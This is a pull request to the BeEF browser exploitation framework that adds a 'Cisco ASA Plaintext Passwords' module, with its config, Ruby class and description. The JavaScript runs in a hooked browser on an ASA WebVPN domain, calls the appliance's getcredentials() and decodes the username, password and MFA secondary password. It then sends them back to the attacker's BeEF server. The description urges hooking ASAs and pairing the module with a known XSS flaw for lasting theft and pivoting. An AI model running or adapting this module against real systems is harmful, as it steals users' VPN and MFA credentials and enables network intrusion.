### PR TITLE
Cisco ASA Plaintext Password Recovery

### DIFF
--- a/modules/browser/hooked_domain/cisco_asa_password_disclosure/command.js
+++ b/modules/browser/hooked_domain/cisco_asa_password_disclosure/command.js
@@ -1,0 +1,24 @@
+//
+// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var s = document.createElement("script");
+  s.src = "/+CSCOE+/common.js"
+  document.body.appendChild(s);
+  s = document.createElement("script");
+  s.src = "/+CSCOE+/appstart.js";
+  document.body.appendChild(s);
+  setTimeout(function () {
+    creds = getcredentials();
+    var result = [];
+    result.push({
+      "username": rot13(hex_2_ascii(creds.split('/')[0].split('=')[1])),
+      "password": rot13(hex_2_ascii(creds.split('/')[1].split('=')[1])),
+      "secondary_password": rot13(hex_2_ascii(creds.split('/')[5].split('=')[1]))
+    });
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=" + JSON.stringify(result));
+  }, 3000);
+});

--- a/modules/browser/hooked_domain/cisco_asa_password_disclosure/command.js
+++ b/modules/browser/hooked_domain/cisco_asa_password_disclosure/command.js
@@ -11,14 +11,19 @@ beef.execute(function() {
   s = document.createElement("script");
   s.src = "/+CSCOE+/appstart.js";
   document.body.appendChild(s);
-  setTimeout(function () {
-    creds = getcredentials();
-    var result = [];
-    result.push({
-      "username": rot13(hex_2_ascii(creds.split('/')[0].split('=')[1])),
-      "password": rot13(hex_2_ascii(creds.split('/')[1].split('=')[1])),
-      "secondary_password": rot13(hex_2_ascii(creds.split('/')[5].split('=')[1]))
-    });
-    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=" + JSON.stringify(result));
-  }, 3000);
+
+  if (typeof getcredentials === "function") {
+    setTimeout(function () {
+      creds = getcredentials();
+      var result = [];
+      result.push({
+        "username": rot13(hex_2_ascii(creds.split('/')[0].split('=')[1])),
+        "password": rot13(hex_2_ascii(creds.split('/')[1].split('=')[1])),
+        "secondary_password": rot13(hex_2_ascii(creds.split('/')[5].split('=')[1]))
+      });
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=" + JSON.stringify(result));
+    }, 3000);
+  } else {
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "failed, most likely due to no auth");
+  }
 });

--- a/modules/browser/hooked_domain/cisco_asa_password_disclosure/config.yaml
+++ b/modules/browser/hooked_domain/cisco_asa_password_disclosure/config.yaml
@@ -1,0 +1,15 @@
+#
+# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        Cisco_asa_passwords:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Cisco ASA Plaintext Passwords"
+            description: "Recover Username, password, and second password (MFA) used for a Cisco ASA WebVPN session. The hooked domain needs to be the domain authenticated against."
+            authors: ["catatonicprime"]
+            target:
+                working: ["All"]

--- a/modules/browser/hooked_domain/cisco_asa_password_disclosure/module.rb
+++ b/modules/browser/hooked_domain/cisco_asa_password_disclosure/module.rb
@@ -1,0 +1,12 @@
+#
+# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Cisco_asa_passwords < BeEF::Core::Command
+  def post_execute
+    content = {}
+    content['cisco_asa_passwords'] = @datastore['cisco_asa_passwords']
+    save content
+  end
+end


### PR DESCRIPTION
# Pull Request
Adds a plaintext credential recovery for Cisco ASA WebVPN. Cisco has told me that this isn't a vulnerability & they will not be patching it, which means you will be able to do this in perpetuity. So get your hooks onto an ASA, if/when the user logs in, or is already logged into a target ASA, you can recover their plaintext credentials for that particular session. This may open up future pivoting.

Also, shout out to the use of ROT13 by a multi-billion dollar company to do... something?

Based on: https://github.com/catatonicprime/CVE-2020-3580

## Category
Module

## Feature/Issue Description
**Q:** Please give a brief summary of your feature/fix
**A:** Noticed that Cisco ASA's let you recovery ROT13 versions of the current session's password. And they have known XSS vulns (CVE-2020-3580). Match made in heaven. 

**Q:** Give a technical rundown of what you have changed (if applicable)
**A:** Cisco ASA's store credentials in plaintext (CWE-256) in a ramfs. These credentials are used for proxying future requests to certain backend services, e.g. SMB shares. These services may be hardcoded, e.g. you wouldn't be able to reflect them back to yourself in many cases. I would expect the authentication to be write-only & also unidirectional. We put the password in, but then we are not able to later retrieve the password.

## Test Cases
**Q:** Describe your test cases, what you have covered and if there are any use cases that still need addressing.
**A:** Authenticated & Non-Authenticated systems with user, password, secondary_password fields. I have not tested any other configuration.
